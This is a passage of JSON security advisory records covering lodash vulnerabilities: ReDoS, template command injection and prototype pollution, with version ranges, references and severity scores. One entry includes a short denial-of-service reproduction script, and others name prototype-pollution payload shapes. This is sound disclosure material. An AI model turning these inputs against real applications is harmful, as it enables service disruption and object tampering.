"https://www.npmjs.com/advisories/88" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2020-08-31T18:10:22Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-29mw-wpgm-hmr9", "published": "2022-01-06T20:30:46Z", "modified": "2025-09-29T21:12:31.102523Z", "aliases": [ "CVE-2020-28500" ], "summary": "Regular Expression Denial of Service (ReDoS) in lodash", "details": "All versions of package lodash prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the `toNumber`, `trim` and `trimEnd` functions. \n\nSteps to reproduce (provided by reporter Liyuan Chen):\n```js\nvar lo = require('lodash');\n\nfunction build_blank(n) {\n var ret = \"1\"\n for (var i = 0; i \u003c n; i++) {\n ret += \" \"\n }\n return ret + \"1\";\n}\nvar s = build_blank(50000) var time0 = Date.now();\nlo.trim(s) \nvar time_cost0 = Date.now() - time0;\nconsole.log(\"time_cost0: \" + time_cost0);\nvar time1 = Date.now();\nlo.toNumber(s) var time_cost1 = Date.now() - time1;\nconsole.log(\"time_cost1: \" + time_cost1);\nvar time2 = Date.now();\nlo.trimEnd(s);\nvar time_cost2 = Date.now() - time2;\nconsole.log(\"time_cost2: \" + time_cost2);\n```", "affected": [ { "package": { "name": "lodash", "ecosystem": "npm", "purl": "pkg:npm/lodash" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.17.21" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-29mw-wpgm-hmr9/GHSA-29mw-wpgm-hmr9.json" } }, { "package": { "name": "lodash-es", "ecosystem": "npm", "purl": "pkg:npm/lodash-es" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.17.21" } ] } ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-29mw-wpgm-hmr9/GHSA-29mw-wpgm-hmr9.json" } }, { "package": { "name": "lodash.trimend", "ecosystem": "npm", "purl": "pkg:npm/lodash.trimend" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.0.0" }, { "last_affected": "4.5.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-29mw-wpgm-hmr9/GHSA-29mw-wpgm-hmr9.json" } }, { "package": { "name": "lodash.trim", "ecosystem": "npm", "purl": "pkg:npm/lodash.trim" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.0.0" }, { "last_affected": "4.5.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-29mw-wpgm-hmr9/GHSA-29mw-wpgm-hmr9.json" } }, { "package": { "name": "lodash-rails", "ecosystem": "RubyGems", "purl": "pkg:gem/lodash-rails" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.17.21" } ] } ], "versions": [ "4.0.0", "4.11.2", "4.12.0", "4.13.1", "4.14.1", "4.15.0", "4.16.1", "4.16.3", "4.16.4", "4.16.6", "4.17.10", "4.17.11", "4.17.14", "4.17.15", "4.17.2", "4.17.4", "4.17.5", "4.3.0", "4.5.1", "4.6.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-29mw-wpgm-hmr9/GHSA-29mw-wpgm-hmr9.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28500" }, { "type": "WEB", "url": "https://github.com/github/advisory-database/pull/6139" }, { "type": "WEB", "url": "https://github.com/lodash/lodash/pull/5065" }, { "type": "WEB", "url": "https://github.com/lodash/lodash/pull/5065/commits/02906b8191d3c100c193fe6f7b27d1c40f200bb7" }, { "type": "WEB", "url": "https://github.com/lodash/lodash/commit/c4847ebe7d14540bb28a8b932a9ce1b9ecbfee1a" }, { "type": "WEB", "url": 
"https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-LODASH-1018905" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074893" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074895" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074892" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074894" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074896" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210312-0006" }, { "type": "WEB", "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2020-28500.yml" }, { "type": "WEB", "url": "https://github.com/lodash/lodash/blob/npm/trimEnd.js%23L8" }, { "type": "PACKAGE", "url": "https://github.com/lodash/lodash" }, { "type": "WEB", "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf" } ], "database_specific": { "cwe_ids": [ "CWE-1333", "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2021-03-19T22:45:28Z", "nvd_published_at": "2021-02-15T11:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-35jh-r3h4-6jhm", "published": "2021-05-06T16:05:51Z", "modified": "2025-08-12T21:55:57.719943Z", "aliases": [ "CVE-2021-23337" ], "summary": "Command Injection in lodash", "details": "`lodash` versions prior to 4.17.21 are vulnerable to Command Injection via the template function.", "affected": [ { "package": { "name": "lodash", "ecosystem": "npm", "purl": "pkg:npm/lodash" }, "ranges": [ { 
"type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "4.17.21" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-35jh-r3h4-6jhm/GHSA-35jh-r3h4-6jhm.json" } }, { "package": { "name": "lodash-es", "ecosystem": "npm", "purl": "pkg:npm/lodash-es" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "4.17.21" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-35jh-r3h4-6jhm/GHSA-35jh-r3h4-6jhm.json" } }, { "package": { "name": "lodash.template", "ecosystem": "npm", "purl": "pkg:npm/lodash.template" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "last_affected": "4.5.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-35jh-r3h4-6jhm/GHSA-35jh-r3h4-6jhm.json" } }, { "package": { "name": "lodash-template", "ecosystem": "npm", "purl": "pkg:npm/lodash-template" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "last_affected": "1.0.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-35jh-r3h4-6jhm/GHSA-35jh-r3h4-6jhm.json" } }, { "package": { "name": "lodash-rails", "ecosystem": "RubyGems", "purl": "pkg:gem/lodash-rails" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.17.21" } ] } ], "versions": [ "0.10.0", "0.7.0", "0.8.1", "0.8.2", "0.9.0", "0.9.1", "0.9.2", "1.0.0.rc.1", "1.0.0.rc.2", "1.0.0.rc.3", "1.0.1", "1.1.0", "1.1.1", "1.2.0", "1.2.1", "1.3.1", "2.0.0", "2.1.0", "2.2.0", "2.2.1", "2.3.0", "2.4.0", "2.4.1", "3.1.0", "3.10.0", "3.10.1", "3.2.0", "3.3.0", "3.3.1", "3.3.1.1", "3.4.0", "3.5.0", "3.6.0", "3.7.0", "3.9.3", "4.0.0", "4.11.2", "4.12.0", "4.13.1", "4.14.1", "4.15.0", "4.16.1", "4.16.3", 
"4.16.4", "4.16.6", "4.17.10", "4.17.11", "4.17.14", "4.17.15", "4.17.2", "4.17.4", "4.17.5", "4.3.0", "4.5.1", "4.6.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-35jh-r3h4-6jhm/GHSA-35jh-r3h4-6jhm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-23337" }, { "type": "WEB", "url": "https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-LODASH-1040724" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074929" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074931" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074928" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074930" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074932" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210312-0006" }, { "type": "WEB", "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2021-23337.yml" }, { "type": "WEB", "url": "https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js#L14851" }, { "type": "PACKAGE", "url": "https://github.com/lodash/lodash" }, { "type": "WEB", "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf" } ], "database_specific": { "cwe_ids": [ "CWE-77", "CWE-94" ], "github_reviewed": true, "github_reviewed_at": "2021-03-31T23:59:26Z", "nvd_published_at": 
"2021-02-15T13:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4xc9-xhrj-v574", "published": "2019-02-07T18:16:48Z", "modified": "2025-08-12T21:55:35.778975Z", "aliases": [ "CVE-2018-16487" ], "summary": "Prototype Pollution in lodash", "details": "Versions of `lodash` before 4.17.11 are vulnerable to prototype pollution. \n\nThe vulnerable functions are 'defaultsDeep', 'merge', and 'mergeWith' which allow a malicious user to modify the prototype of `Object` via `{constructor: {prototype: {...}}}` causing the addition or modification of an existing property that will exist on all objects.\n\n\n\n\n## Recommendation\n\nUpdate to version 4.17.11 or later.", "affected": [ { "package": { "name": "lodash", "ecosystem": "npm", "purl": "pkg:npm/lodash" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "4.17.11" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/02/GHSA-4xc9-xhrj-v574/GHSA-4xc9-xhrj-v574.json" } }, { "package": { "name": "lodash-rails", "ecosystem": "RubyGems", "purl": "pkg:gem/lodash-rails" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.17.11" } ] } ], "versions": [ "0.10.0", "0.7.0", "0.8.1", "0.8.2", "0.9.0", "0.9.1", "0.9.2", "1.0.0.rc.1", "1.0.0.rc.2", "1.0.0.rc.3", "1.0.1", "1.1.0", "1.1.1", "1.2.0", "1.2.1", "1.3.1", "2.0.0", "2.1.0", "2.2.0", "2.2.1", "2.3.0", "2.4.0", "2.4.1", "3.1.0", "3.10.0", "3.10.1", "3.2.0", "3.3.0", "3.3.1", "3.3.1.1", "3.4.0", "3.5.0", "3.6.0", "3.7.0", "3.9.3", "4.0.0", "4.11.2", "4.12.0", "4.13.1", "4.14.1", "4.15.0", "4.16.1", "4.16.3", "4.16.4", "4.16.6", "4.17.10", "4.17.2", "4.17.4", "4.17.5", "4.3.0", "4.5.1", "4.6.1" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/02/GHSA-4xc9-xhrj-v574/GHSA-4xc9-xhrj-v574.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-16487" }, { "type": "WEB", "url": "https://github.com/lodash/lodash/commit/90e6199a161b6445b01454517b40ef65ebecd2ad" }, { "type": "WEB", "url": "https://hackerone.com/reports/380873" }, { "type": "WEB", "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2018-16487.yml" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190919-0004" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T20:59:41Z", "nvd_published_at": null, "severity": "HIGH" } }, { "schema_version": "1.7.3", "id": "GHSA-fvqr-27wr-82fm", "published": "2018-07-26T15:14:52Z", "modified": "2025-08-12T21:55:16.003066Z", "aliases": [ "CVE-2018-3721" ], "summary": "Prototype Pollution in lodash", "details": "Versions of `lodash` before 4.17.5 are vulnerable to prototype pollution. 
\n\nThe vulnerable functions are 'defaultsDeep', 'merge', and 'mergeWith' which allow a malicious user to modify the prototype of `Object` via `__proto__` causing the addition or modification of an existing property that will exist on all objects.\n\n\n\n\n## Recommendation\n\nUpdate to version 4.17.5 or later.", "affected": [ { "package": { "name": "lodash", "ecosystem": "npm", "purl": "pkg:npm/lodash" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "4.17.5" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/07/GHSA-fvqr-27wr-82fm/GHSA-fvqr-27wr-82fm.json" } }, { "package": { "name": "lodash-rails", "ecosystem": "RubyGems", "purl": "pkg:gem/lodash-rails" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.17.5" } ] } ], "versions": [ "0.10.0", "0.7.0", "0.8.1", "0.8.2", "0.9.0", "0.9.1", "0.9.2", "1.0.0.rc.1", "1.0.0.rc.2", "1.0.0.rc.3", "1.0.1", "1.1.0", "1.1.1", "1.2.0", "1.2.1", "1.3.1", "2.0.0", "2.1.0", "2.2.0", "2.2.1", "2.3.0", "2.4.0", "2.4.1", "3.1.0", "3.10.0", "3.10.1", "3.2.0", "3.3.0", "3.3.1", "3.3.1.1", "3.4.0", "3.5.0", "3.6.0", "3.7.0", "3.9.3", "4.0.0", "4.11.2", "4.12.0", "4.13.1", "4.14.1", "4.15.0", "4.16.1", "4.16.3", "4.16.4", "4.16.6", "4.17.2", "4.17.4", "4.3.0", "4.5.1", "4.6.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/07/GHSA-fvqr-27wr-82fm/GHSA-fvqr-27wr-82fm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-3721" }, { "type": "WEB", "url": "https://github.com/lodash/lodash/commit/d8e069cc3410082e44eb18fcf8e7f3d08ebe1d4a" }, { "type": "WEB", "url": "https://hackerone.com/reports/310443" }, { "type": "WEB", "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2018-3721.yml" }, { "type": "WEB", "url": 
"https://security.netapp.com/advisory/ntap-20190919-0004" } ], "database_specific": { "cwe_ids": [ "CWE-1321", "CWE-471" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:35:26Z", "nvd_published_at": "2018-06-07T02:29:08Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-jf85-cpcp-j695", "published": "2019-07-10T19:45:23Z", "modified": "2025-08-12T21:56:37.293794Z", "aliases": [ "CVE-2019-10744" ], "summary": "Prototype Pollution in lodash", "details": "Versions of `lodash` before 4.17.12 are vulnerable to Prototype Pollution. The function `defaultsDeep` allows a malicious user to modify the prototype of `Object` via `{constructor: {prototype: {...}}}` causing the addition or modification of an existing property that will exist on all objects.\n\n## Recommendation\n\nUpdate to version 4.17.12 or later.", "affected": [ { "package": { "name": "lodash", "ecosystem": "npm", "purl": "pkg:npm/lodash" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "4.17.12" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-jf85-cpcp-j695/GHSA-jf85-cpcp-j695.json" } }, { "package": { "name": "lodash-es", "ecosystem": "npm", "purl": "pkg:npm/lodash-es" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "4.17.14" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-jf85-cpcp-j695/GHSA-jf85-cpcp-j695.json" } }, { "package": { "name": "lodash-amd", "ecosystem": "npm", "purl": "pkg:npm/lodash-amd" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "4.17.13" } ] } ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-jf85-cpcp-j695/GHSA-jf85-cpcp-j695.json" } }, { "package": { "name": "lodash.defaultsdeep", "ecosystem": "npm", "purl": "pkg:npm/lodash.defaultsdeep" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "4.6.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-jf85-cpcp-j695/GHSA-jf85-cpcp-j695.json" } }, { "package": { "name": "lodash-rails", "ecosystem": "RubyGems", "purl": "pkg:gem/lodash-rails" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.17.12" } ] } ], "versions": [ "0.10.0", "0.7.0", "0.8.1", "0.8.2", "0.9.0", "0.9.1", "0.9.2", "1.0.0.rc.1", "1.0.0.rc.2", "1.0.0.rc.3", "1.0.1", "1.1.0", "1.1.1", "1.2.0", "1.2.1", "1.3.1", "2.0.0", "2.1.0", "2.2.0", "2.2.1", "2.3.0", "2.4.0", "2.4.1", "3.1.0", "3.10.0", "3.10.1", "3.2.0", "3.3.0", "3.3.1", "3.3.1.1", "3.4.0", "3.5.0", "3.6.0", "3.7.0", "3.9.3", "4.0.0", "4.11.2", "4.12.0", "4.13.1", "4.14.1", "4.15.0", "4.16.1", "4.16.3", "4.16.4", "4.16.6", "4.17.10", "4.17.11", "4.17.2", "4.17.4", "4.17.5", "4.3.0", "4.5.1", "4.6.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-jf85-cpcp-j695/GHSA-jf85-cpcp-j695.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10744" }, { "type": "WEB", "url": "https://github.com/lodash/lodash/pull/4336" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3024" }, { "type": "WEB", "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2019-10744.yml" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20191004-0005" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-LODASH-450202" }, { "type": "WEB", "url": 
"https://support.f5.com/csp/article/K47105354?utm_source=f5support\u0026amp%3Butm_medium=RSS" }, { "type": "WEB", "url": "https://support.f5.com/csp/article/K47105354?utm_source=f5support\u0026amp;utm_medium=RSS" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" } ], "database_specific": { "cwe_ids": [ "CWE-1321", "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2019-07-10T19:41:11Z", "nvd_published_at": "2019-07-26T00:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-p6mc-m468-83gw", "published": "2020-07-15T19:15:48Z", "modified": "2025-08-12T21:56:17.174859Z", "aliases": [ "CVE-2020-8203" ], "summary": "Prototype Pollution in lodash", "details": "Versions of lodash prior to 4.17.19 are vulnerable to Prototype Pollution. The functions `pick`, `set`, `setWith`, `update`, `updateWith`, and `zipObjectDeep` allow a malicious user to modify the prototype of Object if the property identifiers are user-supplied. 
Being affected by this issue requires manipulating objects based on user-provided property values or arrays.\n\nThis vulnerability causes the addition or modification of an existing property that will exist on all objects and may lead to Denial of Service or Code Execution under specific circumstances.", "affected": [ { "package": { "name": "lodash", "ecosystem": "npm", "purl": "pkg:npm/lodash" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "3.7.0" }, { "fixed": "4.17.19" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/07/GHSA-p6mc-m468-83gw/GHSA-p6mc-m468-83gw.json" } }, { "package": { "name": "lodash-es", "ecosystem": "npm", "purl": "pkg:npm/lodash-es" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "3.7.0" }, { "fixed": "4.17.20" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/07/GHSA-p6mc-m468-83gw/GHSA-p6mc-m468-83gw.json" } }, { "package": { "name": "lodash.pick", "ecosystem": "npm", "purl": "pkg:npm/lodash.pick" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.0.0" }, { "last_affected": "4.4.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/07/GHSA-p6mc-m468-83gw/GHSA-p6mc-m468-83gw.json" } }, { "package": { "name": "lodash.set", "ecosystem": "npm", "purl": "pkg:npm/lodash.set" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "3.7.0" }, { "last_affected": "4.3.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/07/GHSA-p6mc-m468-83gw/GHSA-p6mc-m468-83gw.json" } }, { "package": { "name": "lodash.setwith", "ecosystem": "npm", "purl": "pkg:npm/lodash.setwith" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "last_affected": "4.3.2" } ] } ], 
"database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/07/GHSA-p6mc-m468-83gw/GHSA-p6mc-m468-83gw.json" } }, { "package": { "name": "lodash.update", "ecosystem": "npm", "purl": "pkg:npm/lodash.update" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "last_affected": "4.10.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/07/GHSA-p6mc-m468-83gw/GHSA-p6mc-m468-83gw.json" } }, { "package": { "name": "lodash.updatewith", "ecosystem": "npm", "purl": "pkg:npm/lodash.updatewith" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "last_affected": "4.10.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/07/GHSA-p6mc-m468-83gw/GHSA-p6mc-m468-83gw.json" } }, { "package": { "name": "lodash-rails", "ecosystem": "RubyGems", "purl": "pkg:gem/lodash-rails" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.7.0" }, { "fixed": "4.17.19" } ] } ], "versions": [ "3.10.0", "3.10.1", "3.7.0", "3.9.3", "4.0.0", "4.11.2", "4.12.0", "4.13.1", "4.14.1", "4.15.0", "4.16.1", "4.16.3", "4.16.4", "4.16.6", "4.17.10", "4.17.11", "4.17.14", "4.17.15", "4.17.2", "4.17.4", "4.17.5", "4.3.0", "4.5.1", "4.6.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/07/GHSA-p6mc-m468-83gw/GHSA-p6mc-m468-83gw.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8203" }, { "type": "WEB", "url": "https://github.com/lodash/lodash/issues/4744" }, { "type": "WEB", "url": "https://github.com/lodash/lodash/issues/4874" }, { "type": "WEB", "url": "https://github.com/github/advisory-database/pull/2884" }, { "type": "WEB", "url": "https://github.com/lodash/lodash/commit/c84fe82760fb2d3e03a63379b297a1cc1a2fce12" }, { 
"type": "WEB", "url": "https://hackerone.com/reports/712065" }, { "type": "WEB", "url": "https://hackerone.com/reports/864701" }, { "type": "PACKAGE", "url": "https://github.com/lodash/lodash" }, { "type": "WEB", "url": "https://github.com/lodash/lodash/wiki/Changelog#v41719" }, { "type": "WEB", "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2020-8203.yml" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200724-0006" }, { "type": "WEB", "url": "https://web.archive.org/web/20210914001339/https://github.com/lodash/lodash/issues/4744" } ], "database_specific": { "cwe_ids": [ "CWE-1321", "CWE-770" ], "github_reviewed": true, "github_reviewed_at": "2020-07-15T19:14:58Z", "nvd_published_at": "2020-07-15T17:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-x5rq-j2xg-h7qm", "published": "2019-07-19T16:13:07Z", "modified": "2025-09-29T21:05:48.105698Z", "aliases": [ "CVE-2019-1010266" ], "summary": "Regular Expression Denial of Service (ReDoS) in lodash", "details": "lodash prior to 4.7.11 is affected by: CWE-400: Uncontrolled Resource Consumption. The impact is: Denial of service. The component is: Date handler. The attack vector is: Attacker provides very long strings, which the library attempts to match using a regular expression. 
The fixed version is: 4.7.11.", "affected": [ { "package": { "name": "lodash", "ecosystem": "npm", "purl": "pkg:npm/lodash" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.7.0" }, { "fixed": "4.17.11" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-x5rq-j2xg-h7qm/GHSA-x5rq-j2xg-h7qm.json" } }, { "package": { "name": "lodash-es", "ecosystem": "npm", "purl": "pkg:npm/lodash-es" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.7.0" }, { "fixed": "4.17.11" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-x5rq-j2xg-h7qm/GHSA-x5rq-j2xg-h7qm.json" } }, { "package": { "name": "lodash-amd", "ecosystem": "npm", "purl": "pkg:npm/lodash-amd" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.7.0" }, { "fixed": "4.17.11" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-x5rq-j2xg-h7qm/GHSA-x5rq-j2xg-h7qm.json" } }, { "package": { "name": "lodash-rails", "ecosystem": "RubyGems", "purl": "pkg:gem/lodash-rails" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.7.0" }, { "fixed": "4.17.11" } ] } ], "versions": [ "4.11.2", "4.12.0", "4.13.1", "4.14.1", "4.15.0", "4.16.1", "4.16.3", "4.16.4", "4.16.6", "4.17.10", "4.17.2", "4.17.4", "4.17.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-x5rq-j2xg-h7qm/GHSA-x5rq-j2xg-h7qm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010266" }, { "type": "WEB", "url": "https://github.com/lodash/lodash/issues/3359" }, { "type": "WEB", "url": "https://github.com/github/advisory-database/pull/6138" }, { "type": "WEB", "url": 
